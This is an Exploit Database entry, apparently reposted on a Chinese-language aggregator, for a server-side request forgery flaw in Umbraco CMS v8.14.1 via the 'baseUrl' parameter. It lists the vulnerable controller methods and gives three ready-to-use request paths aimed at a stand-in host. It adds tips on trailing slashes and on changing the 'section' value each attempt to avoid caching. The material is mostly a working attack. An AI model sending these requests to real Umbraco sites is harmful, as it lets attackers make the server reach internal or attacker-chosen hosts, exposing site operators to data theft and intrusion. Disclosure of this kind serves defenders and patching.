Umbraco v8.14.1 – ‘baseUrl’ SSRF

• Exploit Database
• 15 阅读

• 作者： NgoAnhDuc
  日期： 2021-10-29
• 类别：

  • webapps
  平台：

  • aspx
• 来源：https://www.exploit-db.com/exploits/50462/

• # Exploit Title: Umbraco v8.14.1 - 'baseUrl' SSRF
  # Date: July 5, 2021
  # Exploit Author: NgoAnhDuc
  # Vendor Homepage: https://our.umbraco.com/
  # Software Link: https://our.umbraco.com/download/releases/8141
  # Version: v8.14.1
  # Affect: Umbraco CMS v8.14.1, Umbraco Cloud
  
  Vulnerable code:
  
  Umbraco.Web.Editors.HelpController.GetContextHelpForPage():
  https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/HelpController.cs#L14
  Umbraco.Web.Editors.DashboardController.GetRemoteDashboardContent():
  https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/DashboardController.cs#L50
  Umbraco.Web.Editors.DashboardController.GetRemoteDashboardCss():
  https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/DashboardController.cs#L91
  
  PoC:
  
  /umbraco/BackOffice/Api/Help/GetContextHelpForPage?section=content&tree=undefined&baseUrl=https://SSRF-HOST.EXAMPLE
  /umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent?section=TryToAvoidGetCacheItem111&baseUrl=
  https://SSRF-HOST.EXAMPLE/
  /umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?section=AvoidGetCacheItem&baseUrl=https://SSRF-HOST.EXAMPLE/
  
  Notes:
  - There's no "/" suffix in payload 1
  - "/" suffix is required in payload 2 and payload 3
  - "section" parameter value must be changed each exploit attempt